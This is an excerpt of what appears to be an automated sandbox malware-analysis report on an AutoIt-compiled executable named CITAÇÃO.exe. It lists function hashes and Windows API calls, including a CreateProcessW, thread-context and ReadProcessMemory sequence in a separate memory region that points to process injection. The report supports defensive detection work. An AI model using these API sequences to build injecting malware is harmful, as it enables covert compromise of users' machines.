                                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction Fuzzy Hash: BF62FA74A142589BEB24CFA4CC50BDEB376EF58300F1091AAD10DEB390E7769E85CB59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                      APIs
                                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                      • _free.LIBCMT ref: 004295A0
                                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 3938964917-3764721689
                                                      • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                      • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: Error:
                                                      • API String ID: 4104443479-232661952
                                                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                      Strings
                                                      Similarity
                                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                      • String ID: X$pWH
                                                      • API String ID: 85490731-941433119
                                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _memmove.LIBCMT ref: 00401B57
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      Strings
                                                      Similarity
                                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                      • String ID: @EXITCODE
                                                      • API String ID: 2734553683-3436989551
                                                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                      Strings
                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                      • C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, xrefs: 00410107
                                                      Similarity
                                                      • API ID: _strcat
                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 1765576173-1475317767
                                                      • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                      • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                      APIs
                                                      Similarity
                                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1794320848-0
                                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                      Similarity
                                                      • API ID: Process$CurrentTerminate
                                                      • String ID:
                                                      • API String ID: 2429186680-0
                                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                      • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                      • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                      • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0043214B
                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                      • _malloc.LIBCMT ref: 0043215D
                                                      • _malloc.LIBCMT ref: 0043216F
                                                      Similarity
                                                      • API ID: _malloc$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 680241177-0
                                                      • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                      • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                      APIs
                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                      Similarity
                                                      • API ID: Message$DispatchPeekTranslate
                                                      • String ID:
                                                      • API String ID: 4217535847-0
                                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                      APIs
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                      • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                      • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                      • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      APIs
                                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                      • _strcat.LIBCMT ref: 0040F786
                                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                      • String ID:
                                                      • API String ID: 3199840319-0
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: FreeInfoLibraryParametersSystem
                                                      • String ID:
                                                      • API String ID: 3403648963-0
                                                      APIs
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      • __lock_file.LIBCMT ref: 00414A8D
                                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00415012
                                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2999321469-0
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F73303
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F73399
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F733BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _memmove.LIBCMT ref: 00444B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: _malloc_memmove
                                                      • String ID:
                                                      • API String ID: 1183979061-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: __lock_file
                                                      • String ID:
                                                      • API String ID: 3031932315-0
                                                      APIs
                                                        • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                                        • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                                        • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                                      • VariantClear.OLEAUT32(?), ref: 0047973E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Variant$Clear$CopyInit
                                                      • String ID:
                                                      • API String ID: 24293632-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 03F73B59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      APIs
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                      • SendMessageW.USER32 ref: 0047CA7F
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                      • ImageList_SetDragCursorImage.COMCTL32(00AB1F10,00000000,00000000,00000000), ref: 0047CB9B
                                                      • ImageList_BeginDrag.COMCTL32(00AB1F10,00000000,000000F8,000000F0), ref: 0047CBAC
                                                      • SetCapture.USER32(?), ref: 0047CBB6
                                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                      • SendMessageW.USER32 ref: 0047CD12
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                      • SendMessageW.USER32 ref: 0047CD80
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                      • SendMessageW.USER32 ref: 0047CE93
                                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,00A61BD8,00000000,?,?,?,?), ref: 0047CF1C
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                      • SendMessageW.USER32 ref: 0047CF6B
                                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,00A61BD8,00000000,?,?,?,?), ref: 0047CFE6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3100379633-4164748364
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00434420
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                      • IsIconic.USER32(?), ref: 0043444F
                                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                      Strings
                                                      Similarity
                                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 2889586943-2988720461
                                                      APIs
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                      • _wcslen.LIBCMT ref: 00446498
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _wcsncpy.LIBCMT ref: 004464C0
                                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                      • CloseDesktop.USER32(?), ref: 0044657A
                                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                      Strings
                                                      Similarity
                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                      • String ID: $@OH$default$winsta0
                                                      • API String ID: 3324942560-3791954436
                                                      APIs
                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,0040F545,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,004A90E8,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,?,0040F545), ref: 0041013C
                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                        • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • _wcscat.LIBCMT ref: 0044BD94
                                                      • _wcscat.LIBCMT ref: 0044BDBD
                                                      • __wsplitpath.LIBCMT ref: 0044BDEA
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                      • _wcscpy.LIBCMT ref: 0044BE71
                                                      • _wcscat.LIBCMT ref: 0044BE83
                                                      • _wcscat.LIBCMT ref: 0044BE95
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                      • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                      • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                      • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                      • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                      Strings
                                                      Similarity
                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 2188072990-1173974218
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                      • __swprintf.LIBCMT ref: 004789D3
                                                      • __swprintf.LIBCMT ref: 00478A1D
                                                      • __swprintf.LIBCMT ref: 00478A4B
                                                      • __swprintf.LIBCMT ref: 00478A79
                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                      • __swprintf.LIBCMT ref: 00478AA7
                                                      • __swprintf.LIBCMT ref: 00478AD5
                                                      • __swprintf.LIBCMT ref: 00478B03
                                                      Strings
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 999945258-2428617273
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
